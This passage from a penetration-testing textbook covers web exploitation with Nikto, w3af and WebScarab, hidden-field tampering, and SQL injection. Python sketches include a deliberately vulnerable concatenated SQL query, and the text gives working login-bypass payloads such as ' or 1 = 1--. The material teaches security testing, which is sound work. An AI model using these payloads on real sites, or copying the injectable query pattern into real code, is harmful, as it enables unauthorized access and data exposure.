The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, Second Edition (2013)

CHAPTER 6. Web-Based Exploitation

Information in This Chapter:

The Basics of Web Hacking

Nikto: Interrogating Web Servers

w3af: More than Just a Pretty Face

Spidering: Crawling Your Target’s Website

WebScarab: Intercepting Web Requests

Code Injection Attacks

Cross-Site Scripting: Browsers that Trust Sites

ZAP: Putting it All Together Under One Roof

Introduction

Now that you have a good understanding of common network-based attacks, it is important to take some time to discuss the basics of web-based exploitation. The web is certainly one of the most common attack vectors available today because everything is connected to the Internet. Nearly every company today has a web presence, and more often than not, that web presence is dynamic and user-driven. Previous-generation websites were simple static pages coded mostly in hypertext markup language (HTML). By contrast, many of today’s websites include complex coding with back-end database-driven transactions and multiple layers of authentication. Home computers, phones, appliances, and of course systems that belong to our targets are all connected to the Internet.

As our dependence and reliance on the web continues to expand, so does the need to understand how this attack vector can be exploited.

A few years back, people started using words like “Web 2.0” and “cloud-based computing” to describe a shift in the way we interact with our systems and programs. Simply put, these terms are a change in the way computer programs are designed, run, accessed, and stored. Regardless of what words are used to describe it, the truth of the matter is that the Internet is becoming more and more “executable”. It used to be that programs like Microsoft Office had to be installed locally on your physical computer. Now this same functionality can be accessed online in the form of Google Docs and many other cloud computing services. In many instances, there is no local installation and your data, your programs, and your information reside on the server in some physically distant location.

As mentioned earlier, companies are also leveraging the power of an executable web. Online banking, shopping, and record keeping are now commonplace. Everything is interconnected. In many ways, the Internet is like the new “wild west”. Just when it seemed like we were making true progress and fundamental changes to the way we program and architect system software, along comes the Internet and gives us a new way to relearn and repeat many of the security lessons from the past. As people rush to push everything to the web and systems are mashed up and deployed with worldwide accessibility, new attacks are developed and distributed at a furious pace.

It is important that every aspiring hacker and penetration tester understand at least the basics of web-based exploitation.

The Basics of Web Hacking

In the previous chapter, we discussed Metasploit as an exploitation framework. Remember, a framework provides us with a standardized and structured approach to attacking targets. There are many choices when it comes to web application-hacking frameworks, including Web Application Audit and Attack Framework (w3af), Burp Suite, Open Web Application Security Project’s (OWASP) Zed Attack Proxy (ZAP), Websecurify, Paros, and many more. No matter which tool you pick, subtle differences aside (at least from “the basics” perspective), they all offer similar functionality and provide an excellent vehicle to attack the web. The basic idea is to use your browser in the same way that you always do when visiting a website, but send all traffic through a proxy. By sending the traffic through a proxy, you can collect and analyze all your requests as well as the responses from the web application. These toolkits provide a vast array of functionality, but it all boils down to three main ideas related to web hacking:

1. The ability to intercept requests as they leave your browser. This functionality is provided by an intercepting proxy, a core tool in most common web-hacking frameworks. The intercepting proxy is key because it allows you to edit the values of the variables before they reach the web application. At the core of web transactions, the application (that is housed on the web server) is there to accept requests from your browser and serve up pages based on these incoming requests. A big part of each request is the variables that accompany the request. These variables dictate what is returned to the user: for example, what is added to a shopping cart, what bank account information to retrieve, which sports scores to display, and almost every other piece of functionality of today’s web. It is critical to understand that, as the attacker, you are allowed to add, edit, or delete parameters in your request. It is also critical to understand that it is up to the waiting web application to figure out what to do with your malformed request.

2. The ability to find all the web pages, directories, and other files that make up the web application. The goal is to provide you with a better understanding of the attack surface. This functionality is provided by an automated “spidering” tool. The easiest way to uncover all the files and pages on a website is to simply feed a uniform resource locator (URL) into a spider and turn the automated tool loose. However, it is important to understand that a web spider will make several hundred, or even thousands, of requests to the target website, so there is no stealth involved in this activity. As the responses return from the web application, the HTML code of each response is analyzed for additional links. Any newly discovered links will be added to the target list, spidered, cataloged, and analyzed. The spider tool will continue to fire off requests until all the discovered links have been exhausted. In most cases, this type of “set it and forget it” spidering will be very effective in finding the majority of the web-attack surface. However, it will also make requests based on ANY link that it finds, so if you logged into the web app prior to spidering and the spider tool finds a link to “log out” of the website, it will follow that link without notification or warning. This would effectively prevent you from discovering any additional content that is only available to authenticated users. Be mindful of this when spidering so you know which areas of the website you are actually discovering content from. You can also specify exact directories or paths within the target website on which to turn the spidering tool loose. This feature provides a greater sense of control over its functionality.

3. The ability to analyze responses from the web application and inspect them for vulnerabilities. This process is very similar to how Nessus scans for vulnerabilities in network services, but now we are applying the same line of thinking to web applications. As you edit variable values with an intercepting proxy, the web application will have to respond back to you in some way. Likewise, when a scanning tool sends hundreds or thousands of known-malicious requests to a web application, the application must respond in some way. These responses are analyzed for the telltale signs of application-level vulnerabilities. There is a large family of web application vulnerabilities that are purely signature based, so an automated tool is a perfect match for this situation. Obviously, there are other web application vulnerabilities that cannot be noticed by an automated scanner, but we are most interested in the “low-hanging fruit” type of web vulnerabilities. The vulnerabilities that can be found by using an automated web scanner are not irrelevant, but instead are actually some of the most critical families of web attacks in the wild today: structured query language (SQL) injection, cross-site scripting (XSS), and file path manipulation attacks (also commonly known as directory traversal).
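The spidering loop described in item 2 can be sketched in a few lines of Python. This is only an illustration of the idea, not how WebScarab, w3af, or any other tool mentioned here is implemented. The site contents, the host name target.example, and the function names are all hypothetical, and the "site" is an in-memory dictionary so that the sketch sends no real traffic. Note the skip list, which keeps the crawler from following a log-out link.

```python
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class LinkExtractor(HTMLParser):
    """Collect the href value of every <a> tag in an HTML document."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def spider(start_url, fetch, skip_words=("logout",)):
    """Breadth-first crawl that stays on the host of start_url.

    fetch is any callable that takes a URL and returns HTML text,
    or None when the URL has no HTML to offer. Returns every URL
    discovered, sorted, whether or not it could be fetched.
    """
    host = urlparse(start_url).netloc
    seen = {start_url}
    queue = deque([start_url])
    while queue:
        url = queue.popleft()
        html = fetch(url)
        if html is None:
            continue
        parser = LinkExtractor()
        parser.feed(html)
        for href in parser.links:
            link = urljoin(url, href)  # resolve relative links
            if urlparse(link).netloc != host:
                continue  # stay inside the authorized target
            if any(word in link.lower() for word in skip_words):
                continue  # do not follow links that would end the session
            if link not in seen:
                seen.add(link)
                queue.append(link)
    return sorted(seen)


# Hypothetical in-memory "website" standing in for real HTTP responses.
FAKE_SITE = {
    "http://target.example/":
        '<a href="/about.html">About</a> <a href="/docs/">Docs</a> '
        '<a href="/logout">Log out</a>',
    "http://target.example/about.html":
        '<a href="/">Home</a> <a href="http://other.example/">Elsewhere</a>',
    "http://target.example/docs/":
        '<a href="secret.pdf">Draft</a>',
}

if __name__ == "__main__":
    for page in spider("http://target.example/", FAKE_SITE.get):
        print(page)
```

Swapping FAKE_SITE.get for a function that performs real HTTP requests would turn this into a live crawler, which is exactly the point at which the stealth and scope warnings above start to apply.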

Nikto: Interrogating Web Servers

After running a port scan and discovering a service running on port 80 or port 443, one of the first tools that should be used to evaluate the service is Nikto. Nikto is a web server vulnerability scanner written by Chris Sullo and David Lodge. It automates the process of scanning web servers for out-of-date and unpatched software as well as searching for dangerous files that may reside on web servers. Nikto is capable of identifying a wide range of specific issues and also checks the server for configuration issues. The current version of Nikto is built into Kali and can be run from any directory. If you are not using Kali, or your attack machine does not have a copy of Nikto, it can be installed by downloading it from the http://www.cirt.net/Nikto2 website or by running the “apt-get install nikto” command from a terminal. Please note you will need Perl installed to run Nikto.

To view the various options available, you can run the following command from any command line within Kali:

nikto

Running this command will provide you with a brief description of the switches available to you. To run a basic vulnerability scan against a target, you need to specify a host Internet protocol (IP) address with the “-h” switch. You should also specify a port number with the “-p” switch. Nikto is capable of scanning single ports, multiple ports, or a range of ports. For example, to scan for web servers on all ports between 1 and 1000, you would issue the following command in a terminal window:

nikto -h 192.168.18.132 -p 1-1000

To scan multiple ports, which are not contiguous, separate each port to be scanned with a comma as shown below:

nikto -h 192.168.18.132 -p 80,443



If you fail to specify a port number, Nikto will only scan port 80 on your target. If you want to save the Nikto output for later review, you can do so by issuing the “-o” switch followed by the file path and name of the file you would like to use to save the output. Figure 6.1 includes a screenshot of the Nikto output from our example.

FIGURE 6.1 Output of Nikto web vulnerability scanner.
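To make the port syntax concrete, the following Python sketch expands a port specification of the kind shown above ("80,443" or "1-1000") into the individual ports it covers, and assembles the matching Nikto command line. It is an illustration only: the function names are hypothetical, the parser is not Nikto's own, and only the -h, -p, and -o switches described in this section are used.

```python
def expand_port_spec(spec):
    """Expand a spec such as "80,443" or "1-1000" into a sorted list of ports."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            low, high = (int(piece) for piece in part.split("-", 1))
            if low > high:
                raise ValueError(f"bad range: {part}")
            ports.update(range(low, high + 1))
        else:
            ports.add(int(part))
    for port in ports:
        if not 1 <= port <= 65535:
            raise ValueError(f"port out of range: {port}")
    return sorted(ports)


def nikto_command(host, port_spec=None, output_file=None):
    """Build the argument list for a Nikto scan (the scan itself is not run)."""
    argv = ["nikto", "-h", host]
    if port_spec:
        argv += ["-p", port_spec]
    if output_file:
        argv += ["-o", output_file]
    return argv


if __name__ == "__main__":
    print(expand_port_spec("80,443"))
    print(len(expand_port_spec("1-1000")), "ports in the range 1-1000")
    print(" ".join(nikto_command("192.168.18.132", "80,443")))
```

Building the command as a list rather than a single string keeps each switch and its value separate, which avoids quoting problems if the list is later handed to a process launcher.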

w3af: More than Just a Pretty Face

w3af is an awesome tool for scanning and exploiting web resources. It provides an easy-to-use interface that allows penetration testers to quickly and easily identify nearly all the top web-based vulnerabilities including SQL injection, XSS, file includes, cross-site request forgery, and many more.



w3af is easy to set up and use; this makes it very handy for people who are new to web penetration testing. You can access w3af by clicking on Applications → Kali Linux → Web Applications → w3af as shown in Figure 6.2.

FIGURE 6.2 Kali menu to access and start w3af GUI.

w3af can also be started from the terminal by issuing the following command:

w3af



When w3af starts, you will be presented with a Graphical User Interface (GUI) similar to Figure 6.3.

FIGURE 6.3 Setting up a scan with w3af.

The main w3af window allows you to set up and customize your scan. On the left side of the screen, you will find a “Profiles” window. Selecting one of the predefined profiles allows you to quickly run a series of preconfigured scans against your target. Figure 6.3 shows the OWASP_TOP10 profile selected. As you can see from the profile description (presented in the right pane), selecting the OWASP_TOP10 profile will cause w3af to scan your target for each of the top 10 web security flaws (as identified by OWASP). Clicking on each of the profiles causes the active plug-ins to change. The plug-ins are the specific tests that you want w3af to run against your target. The “empty_profile” is blank and allows you to customize the scan by choosing which specific plug-ins you want to use.

Once you have selected your desired profile, you can enter an IP address or URL into the “Target” input box. With your scanning profile and target designated, you can click the “Start” button to begin the test. Depending on which test you chose and the size of your target, the scan may take anywhere from a few seconds to several hours.

When the scan completes, the “Log”, “Results”, and “Exploit” tabs will become active and you can review your findings by clicking through each of these. Figure 6.4 shows the result of our scan. Notice, the check boxes from “Information” and “Error” have been removed. This allows us to focus on the most serious issues first.

FIGURE 6.4 w3af scanning results.

Before moving on from w3af, it is important to review the “Exploit” tab. If the tool was successful in finding any vulnerabilities during the audit phase, you may be able to compromise your target from within w3af. To attempt an exploit with one of the discovered vulnerabilities, you need to click on the “Exploit” tab and locate the Exploits pane. Right-clicking on the listed exploits will present you with a menu and allow you to choose to “Exploit ALL vulns” or “Exploit all until first successful”. To attempt an exploit on your target, simply make your selection and monitor the “Shells” pane. If the exploit was successful in gaining a shell on the target, a new entry will be displayed in the “Shells” pane. Double-clicking this entry will bring up a “Shell” window and allow you to execute commands on your target.

Finally, it is important to understand that you can also run w3af from the terminal. As always, it is highly recommended that you take time to explore and get to know this option as well.

Spidering: Crawling Your Target’s Website

Another great tool to use when initially interacting with a web target is WebScarab. WebScarab was written by Rogan Dawes and is available through the OWASP website. If you are running Kali, a version of WebScarab is already installed. This powerful framework is modular in nature and allows you to load numerous plug-ins to customize it to your needs. Even in its default configuration, WebScarab provides an excellent resource for interacting with and interrogating web targets.

After having run the vulnerability scanners, Nikto and w3af, you may want to run a spidering program on the target website. It should be noted that w3af also provides spidering capabilities, but remember, the goal of this chapter is to expose you to several different tools and methodologies. Spiders are extremely useful in reviewing and reading (or crawling) your target’s website looking for all links and associated files. Each of the links, web pages, and files discovered on your target is recorded and cataloged. This cataloged data can be useful for accessing restricted pages and locating unintentionally disclosed documents or information. You can launch WebScarab by opening a terminal and entering:

webscarab



You can also access the spider function in WebScarab by starting the program through the main menu system. This can be accomplished by clicking Applications → Kali Linux → Web Applications → WebScarab. This will load the WebScarab program. Before you begin spidering your target, you will want to ensure you are in the “full-featured interface” mode. Kali Linux will drop you into this mode by default; however, some previous versions will start with the “Lite interface”. You can switch between the two interface modes by clicking on the “Tools” menu and checking either the “Use full-featured interface” or the “Use Lite interface” option as shown in Figure 6.5.

FIGURE 6.5 Switching WebScarab to run in full-featured interface mode.

After switching to the full-featured interface, you will be prompted to restart WebScarab. Once you restart the tool, you will be given access to a number of new panels along the top of the window including the “Spider” tab.

Now that you have WebScarab loaded, you need to configure your browser to use a proxy. Setting up WebScarab as your proxy will cause all the web traffic going into and coming out of your browser to pass through the WebScarab program. In this respect, the proxy program acts as a middleman and has the ability to view, stop, and even manipulate network traffic.



Setting up your browser to use a proxy is usually done through the preferences or network options. In Iceweasel (default in Kali Linux), you can click on Edit → Preferences. In the Preferences window, click the “Advanced” menu followed by the “Network” tab. Finally, click on the “Settings” button as shown in Figure 6.6.

FIGURE 6.6 Setting up Iceweasel to use WebScarab as a proxy.

Clicking on the “Settings” button will allow you to configure your browser to use WebScarab as a proxy. Select the radio button for “Manual proxy configuration:”. Next, enter 127.0.0.1 in the “HTTP Proxy:” input box (HTTP stands for hypertext transfer protocol). Finally, enter 8008 into the “Port” field. It is usually a good idea to check the box just below the “HTTP Proxy” box labeled “Use this proxy server for all protocols”. Once you have all this information entered, you can click “OK” to exit the Connection Settings window and “Close” to exit the Preferences window.

Figure 6.7 shows an example of the Connection Settings window.

FIGURE 6.7 Connection settings for using WebScarab as a proxy.
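The same proxy settings can be applied to scripted traffic as well as to a browser. The sketch below uses Python's standard urllib.request module to build an opener that routes HTTP and HTTPS requests through 127.0.0.1 on port 8008, the address and port entered above. The function names are hypothetical, and nothing is sent until the opener is actually used to open a URL, so the proxy does not need to be running to try it.

```python
import urllib.request

PROXY_HOST = "127.0.0.1"  # the local machine, where the proxy listens
PROXY_PORT = 8008         # the port entered in the browser settings above


def build_proxy_opener(host=PROXY_HOST, port=PROXY_PORT):
    """Return an opener that sends HTTP and HTTPS traffic through the proxy."""
    proxy_url = f"http://{host}:{port}"
    handler = urllib.request.ProxyHandler({"http": proxy_url, "https": proxy_url})
    return urllib.request.build_opener(handler)


def proxy_settings(opener):
    """Report which proxies an opener is configured to use."""
    for handler in opener.handlers:
        if isinstance(handler, urllib.request.ProxyHandler):
            return dict(handler.proxies)
    return {}


if __name__ == "__main__":
    opener = build_proxy_opener()
    print(proxy_settings(opener))
    # opener.open("http://target.example/") would now pass through the proxy.
    # That call needs the proxy to be running, so it is left commented out.
```

As with the browser, a script configured this way fails to connect if the proxy is closed, which is a quick way to confirm that traffic really is flowing through it.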

At this point, any web traffic coming into or passing out of your browser will route through the WebScarab proxy. There are two words of warning. First, you need to leave WebScarab running while it is serving as a proxy. If you close the program, you will not be able to browse the Internet. If this happens, Iceweasel will provide you with an error message that it cannot find a proxy and you will need to restart WebScarab or change your network configuration in Iceweasel. The second warning is that while surfing the Internet using a local proxy, all HTTPS traffic will show up as having an invalid certificate! This is expected behavior because your proxy is sitting in the middle of your connection.

As a side note, it is important that you always pay attention to invalid security certificates when browsing. At this point, certificates are your best defense and often your only warning against a man-in-the-middle attack.

Now that you have set up a proxy and have configured your browser, you are ready to begin spidering your target. You begin by entering the target URL into the browser. Assume we wanted to see all of the files and directories on the TrustedSec website. Simply browsing to the www.trustedsec.com website using your Iceweasel browser will load the website through WebScarab. Once the website has loaded in your browser, you can switch over to the WebScarab program. You should see the URL you entered (along with any others that you have visited since starting your proxy). To spider the site, right-click the URL and choose “Spider tree” as shown in Figure 6.8.

FIGURE 6.8 Using WebScarab to spider the target website.

You can now view each of the files and folders associated with your target website. Individual folders can be further spidered by right-clicking and choosing “Spider tree” again. You should spend time carefully examining every nook and cranny within your authorized scope. Spidering a website is a great way to find inadvertently disclosed or leaked confidential data on a target website.

Intercepting Requests with WebScarab

As previously mentioned, WebScarab is a very powerful tool. One of its many roles is to function as a proxy server. Recall that a proxy sits between the client (browser) and the server. While the proxy is running, all the web traffic flowing into and out of your browser is passed through the program. Passing traffic through a local proxy provides us with an amazing ability; by running WebScarab in this mode, we are able to stop, intercept, and even change the data either before it arrives or after it leaves the browser. This is a subtle but important point; the use of a proxy allows us to make changes to the data in transit. The ability to manipulate or view HTTP request or response information has serious security implications.

Consider the following: some poorly coded websites rely on the use of hidden fields to transmit information to and from the client. In these instances, the programmer makes use of a hidden field on the form, assuming that the user will not be able to access it. Although this assumption is true for a normal user, anyone leveraging the power of a proxy server will have the ability to access and modify the hidden field.

The classic example of this scenario is the user who was shopping at an online golf store. After browsing the selection, he decided to buy a driver for $299. Being a security analyst, the astute shopper was running a proxy and noticed that the website was using a hidden field to pass the value of the driver ($299) to the server when the “add to cart” button was clicked. The shopper set up his proxy to intercept the HTTP POST request. This means when the information was sent to the server, it was stopped at the proxy. The shopper now had the ability to change the value of the hidden field. After manually changing the value from $299 to $1, the request was sent on to the server. The driver was added to his shopping cart and the new total due was $1.

Although this scenario is not as common as it used to be, it certainly demonstrates the power of using a proxy to intercept and inspect HTTP requests and responses.
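To see why a hidden field offers no protection, it helps to look at what the browser actually sends. A form submission is just a string of name and value pairs, and a hidden field travels in that string like any other. The following Python sketch mimics what the shopper's proxy allowed him to do by hand. The field names (item, quantity, price) and the function name are hypothetical, chosen only for illustration.

```python
from urllib.parse import parse_qsl, urlencode


def tamper_form_body(body, field, new_value):
    """Return a form-encoded body with one field's value replaced."""
    pairs = parse_qsl(body, keep_blank_values=True)
    changed = [(name, new_value if name == field else value)
               for name, value in pairs]
    return urlencode(changed)


if __name__ == "__main__":
    # What the browser sends when "add to cart" is clicked (hypothetical fields).
    intercepted = "item=driver&quantity=1&price=299"
    # What the proxy forwards after the hidden price field is edited.
    print(tamper_form_body(intercepted, "price", "1"))
    # prints: item=driver&quantity=1&price=1
```

The server receives only the edited string. Unless the application looks up the real price on its own side, it has no way of knowing the value was ever different.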



To use WebScarab as an interceptor, you need to configure your browser to use a proxy and start WebScarab as discussed in the “Spidering” section of this chapter. You will also need to configure WebScarab to use the “Lite” interface. You can switch back to the “Lite” interface by starting the program, clicking on the “Tools” menu option, and checking the “Use Lite interface” option. Once WebScarab has finished loading, you will need to click on the “Intercepts” tab. Next, you should check both the “Intercept requests” and “Intercept responses” boxes as shown in Figure 6.9.

FIGURE 6.9 Setting up WebScarab to intercept requests and responses.

At this point, you can use Iceweasel to browse through your target website.

ALERT!

Just a word of warning—you may want to leave the Intercept requests and Intercept responses unchecked until you are ready to test, as nearly every page involves these actions and intercepting everything before you are ready will make your browsing experience painfully slow.

With WebScarab set up as described, the proxy will stop nearly every transaction and allow you to inspect or change the data. Luckily if you find yourself in this situation, WebScarab has included a “Cancel ALL Intercepts” button. This can be handy to keep moving forward.

To change the values of a given field, wait for WebScarab to intercept the request; then locate the variable you wish to change. At this point, you can simply enter a new value in the “value” field and click the “Insert” button to update the field with the new value.

Viewing HTTP responses and requests can also be useful for discovering username and password information. Just remember, the value in many of these fields will be Base64 encoded. Although these values may look as though they are encrypted, you should understand that Base64 is a form of encoding, not encryption. Although these processes may sound similar, they are vastly different. Decoding Base64 is a trivial task that can be accomplished with little effort using a program or an online tool.
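As a quick demonstration of how little effort decoding takes, the sketch below uses Python's standard base64 module. The example assumes the credentials were captured in an HTTP Basic authentication header, which is one common place Base64 values appear. The username, password, and function name are made up for illustration.

```python
import base64


def decode_basic_auth(header_value):
    """Recover (username, password) from a value like 'Basic YWRtaW46c2VjcmV0'."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authentication value")
    decoded = base64.b64decode(token).decode("utf-8")
    username, _, password = decoded.partition(":")
    return username, password


if __name__ == "__main__":
    # Build a sample header the way a browser would (hypothetical credentials).
    token = base64.b64encode(b"admin:secret").decode("ascii")
    header = "Basic " + token
    print(header)
    print(decode_basic_auth(header))
```

No key or password is needed to reverse the encoding, which is the practical difference between encoding and encryption.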

It should be pointed out that there are many good proxy servers available to assist you with the task of data interception. Do not be afraid to explore other proxy servers as well.

Code Injection Attacks

Like buffer overflows in system code, injection attacks have been a serious issue in the web world for many years, and like buffer overflows, there are many different kinds of code injection attacks. Broadly defined, this class of attacks could easily fill a chapter. However, because we are focusing on the basics, we will examine the most basic type of code injection: the classic SQL injection. We will explore the basic commands needed to run an SQL injection and how it can be used to bypass basic web application authentication. Injection attacks can be used for a variety of purposes including bypassing authentication, manipulating data, viewing sensitive data, and even executing commands on the remote host.

Most modern web applications rely on the use of interpreted programming languages and back-end databases to store information and generate dynamically driven content to the user. There are many popular interpreted programming languages in use today including PHP, JavaScript, Active Server Pages, SQL, Python, and countless others. An interpreted language differs from a compiled language because the interpreted language is translated into machine instructions at run time, just before it is executed. Compiled programming languages require the programmer to compile the source code ahead of time and generate an executable file (for example, an .exe file on Windows). In this case, once the program is compiled, its behavior cannot be changed unless the source code is modified, recompiled, and the new executable is redistributed.

In the case of modern web applications, like an e-commerce site, the interpreted language works by building a series of executable statements that utilize both the original programmer’s work and input from the user. Consider an online shopper who wants to purchase more random access memory (RAM) for his computer. The user navigates to his favorite online retailer and enters the term “16 GB RAM” in the search box. After the user clicks the search button, the web app gathers the user’s input (“16 GB RAM”) and constructs a query to search the back-end database for any rows in the product table containing “16 GB RAM.” Any products that contain the keywords “16 GB RAM” are collected from the database and returned to the user’s browser.

Understanding what an interpreted language is and how it works is the key to understanding injection attacks. Knowing that user input will often be used to build code that is executed on the target system, injection attacks focus on submitting, sending, and manipulating user-driven input. The goal of sending manipulated input or queries to a target is to get the target to execute unintended commands or return unintended information back to the attacker.

The classic example of an injection attack is SQL injection. SQL is a programming language that is used to interact with and manipulate data in a database. Using SQL, a user can read, write, modify, and delete data stored in the database tables. Recall from our example above that the user supplied a search string “16 GB RAM” to the web application (an e-commerce website). In this case, the web application generated an SQL statement based off of the user input.

It is important that you understand there are many different flavors of SQL and different vendors may use different verbs to perform the same actions. Specific statements that work in Oracle may not work in MySQL or MSSQL. The information contained below will provide a basic and generic framework for interacting with most applications that use SQL, but you should strive to learn the specific elements for your target.

Consider another example. Assume that our network admin Ben Owned is searching for a Christmas present for his boss. Wanting to make up for many of his past mistakes, Ben decides to browse his favorite online retailer to search for a new laptop. To search the site for laptops, Ben enters the keyword “laptop” (minus the quotes) into a search box. This causes the web application to build an SQL query looking for any rows in the product table that include the word “laptop”. SQL queries are among the most common actions performed by web applications as they are used to search tables and return matching results. The following is an example of a simple SQL query:

SELECT * FROM product WHERE category = 'laptop';

In the statement above, the “SELECT” verb is used to tell SQL that you wish to search and return results from a table. The “*” is used as a wildcard and instructs SQL to return every column from the table when a match is found. The “FROM” keyword is used to tell SQL which table to search and is followed immediately by the actual name of the table (“product” in this example). Finally, the “WHERE” clause is used to set up a test condition. The test condition is used to restrict or specify which rows are to be returned back to the user. In this case, the SELECT statement will return all the rows from the product table that contain the word “laptop” in the “category” column.
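If you would like to run this query yourself, the following Python sketch builds a tiny product table in an in-memory SQLite database and executes the statement against it. SQLite is used here only because it ships with Python. The column layout and the sample rows are invented for illustration and do not come from any real retailer.

```python
import sqlite3


def make_catalog():
    """Create an in-memory database holding a small, made-up product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (name TEXT, category TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO product VALUES (?, ?, ?)",
        [
            ("UltraBook 13", "laptop", 899.00),
            ("WorkStation 17", "laptop", 1499.00),
            ("16 GB RAM kit", "memory", 79.00),
            ("Wireless mouse", "accessory", 19.00),
        ],
    )
    return conn


def find_laptops(conn):
    """Run the query from the text and return the matching rows."""
    return conn.execute(
        "SELECT * FROM product WHERE category = 'laptop';"
    ).fetchall()


if __name__ == "__main__":
    for row in find_laptops(make_catalog()):
        print(row)  # every column of each row whose category is 'laptop'
```

Only the two rows whose category column holds the word laptop come back; the WHERE clause filters out the rest.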

It is important to remember that in real life, most SQL statements you will encounter are much more complex than this example. Oftentimes, an SQL query will interact with several columns from several different tables in the same query. However, armed with this basic SQL knowledge, let us examine this statement a little more closely. We should be able to clearly see that in our example, the user created the value to the right of the “=” sign, whereas the original programmer created everything to the left of the “=” sign. We can combine this knowledge with a little bit of SQL syntax to produce some unexpected results. The programmer built an SQL statement that was already fully constructed except for the string value to be used in the WHERE clause. The application accepts whatever the user types into the “search” textbox and appends that string value to the end of the already created SQL statement. Last, a final single quote is appended onto the SQL statement to balance the quotes. It looks like this when it is all done:

SELECT * FROM product WHERE category = 'laptop'

In this case, SELECT * FROM product WHERE category = ' is created ahead of time by the programmer, while the word laptop is user-supplied and the final ' is appended by the application to balance quotes.

Also notice that when the actual SQL statement was built, it included single quotes around the word “laptop”. The application adds these because “category” is a string data type in the database. Quotes must always be balanced, that is, there must be an even number of quotes in the statement, so that an SQL syntax error does not occur. Failure to have both an opening and a closing quote will cause the SQL statement to error and fail.
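The construction just described can be written out in a few lines of Python. This is a sketch of the vulnerable pattern, not code from any particular application. The function names are hypothetical, and the quote counter is a deliberately simple check used only to illustrate the idea of balance.

```python
# The part of the statement the programmer wrote ahead of time,
# ending with the opening single quote.
PREFIX = "SELECT * FROM product WHERE category = '"


def build_query(user_input):
    """Append the user's text, then a closing quote, as the application does."""
    return PREFIX + user_input + "'"


def quotes_balanced(sql):
    """True when the statement contains an even number of single quotes."""
    return sql.count("'") % 2 == 0


if __name__ == "__main__":
    normal = build_query("laptop")
    print(normal, quotes_balanced(normal))

    # A stray quote in the input leaves the statement unbalanced.
    broken = build_query("lap'top")
    print(broken, quotes_balanced(broken))
```

Because the user's text is pasted straight into the statement, a single quote typed into the search box is enough to change the structure of the query rather than just its value.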

Suppose that rather than simply entering the keyword, laptop, Ben entered the following into the search box:

laptop' or 1 = 1--

In this case, the following SQL statement would be built and executed:

SELECT * FROM product WHERE category = 'laptop' or 1 = 1--'

By adding the extra quote, Ben would close off the string containing the user-supplied word of ‘laptop’ and add some additional code to be executed by the SQL server, namely

or 1 = 1--

The “or” statement above is an SQL condition that is used to return records when either statement is true. The “--” is a programmatic comment. In most SQL versions, everything that follows the “--” is simply ignored by the interpreter. The final single quote is still appended by the application, but it is ignored. This is a very handy trick for bypassing additional code that could interfere with your injection. In this case, the new SQL statement is saying “return all of the records from the product table where the category is ‘laptop’ or 1 = 1”. It should be obvious that 1 = 1 is always true. Because this is a true statement, SQL will actually return all the records in the product table!
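The effect is easy to reproduce in a lab. The Python sketch below runs the search against an in-memory SQLite database, once with the plain keyword and once with the injected input laptop' or 1 = 1--. SQLite stands in for whatever database a real target uses, and the table contents and function names are made up for illustration. The query is built by string concatenation on purpose, because that is the flaw being demonstrated.

```python
import sqlite3


def make_catalog():
    """Create an in-memory database holding a small, made-up product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (name TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO product VALUES (?, ?)",
        [
            ("UltraBook 13", "laptop"),
            ("WorkStation 17", "laptop"),
            ("16 GB RAM kit", "memory"),
            ("Wireless mouse", "accessory"),
        ],
    )
    return conn


def vulnerable_search(conn, user_input):
    """Build the query the unsafe way: paste the input between two quotes."""
    sql = "SELECT * FROM product WHERE category = '" + user_input + "'"
    return sql, conn.execute(sql).fetchall()


if __name__ == "__main__":
    conn = make_catalog()
    for text in ("laptop", "laptop' or 1 = 1--"):
        sql, rows = vulnerable_search(conn, text)
        print(sql)
        print(len(rows), "rows returned")
```

With the plain keyword, only the laptop rows match. With the injected input, the condition is true for every row and the trailing quote is swallowed by the comment, so the whole table comes back.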

The key to understanding how to use SQL injections is to understand the subtleties in how the statements are constructed.

On the whole, the example above may not seem too exciting; instead of returning all the rows containing the keyword laptop, we were able to return the whole table. However, if we apply this type of attack to a slightly different example, you may find the results a bit more sensational.

Many web applications use SQL to perform authentication. You gain access to restricted or confidential locations and material by entering a username and password. As in the previous example, oftentimes this information is constructed from a combination of user-supplied input, the username and password, and programmer-constructed statements.

Consider the following example. The network admin Ben Owned has created a new website that is used to distribute confidential documents to the company’s key strategic partners. Partners are given a unique username and password to log into the website and download material. After setting up his secure website, Ben asks you to perform a penetration test against the site to see if you can bypass his authentication.

You should start this task by using the same technique we examined to return all the data in the “product” table. Remember that the “--” is a common way of commenting out any code that follows it. As a result, in some instances, it is possible to simply enter a username followed by the “--” sequence. If interpreted correctly, this can cause the SQL statement to bypass or ignore the section of code that checks for a password and give you access as the specified user. However, this technique will only work if you already know the username.

If you do not know the username, you should begin by entering the following into the username textbox:

' or 1 = 1--

Leaving the username parameter blank and using an expression that will always evaluate to true is a key way to attack a system when we are unsure of the usernames required to log into a database. Not entering a username will cause most databases to simply grab the first user in the database. In many instances, the first user account in a database is an administrative account. You can enter whatever you want for a password (for example, “syngress”), as the database will not even check it because it is commented out. You do need to supply a password to bypass client-side authentication (or you can use your intercepting proxy to delete this parameter altogether).

SELECT * FROM users WHERE uname = '' or 1 = 1-- and pwd = 'syngress'

At this point, you should either have a username or be prepared to access the database with the first user listed in the database. If you have a username, we need to attack the password field; here again we can enter the statement:

' or 1 = 1--

Because we are using an “or” statement, regardless of what is entered before the first single quote, the statement will always evaluate to true. Upon examining this statement, the interpreter will see that the password is true and grant access to the specified user. If the username parameter is left blank, but the rest of the statement is executed, you will be given access to the first user listed in the database.

In this instance, assuming we have a username, the new SQL statement would look similar to the following:

SELECT * FROM users WHERE uname = 'admin' and pwd = '' or 1 = 1--'

In many instances, the simple injection above will grant you full access to the database as the first user listed in the “users” table.
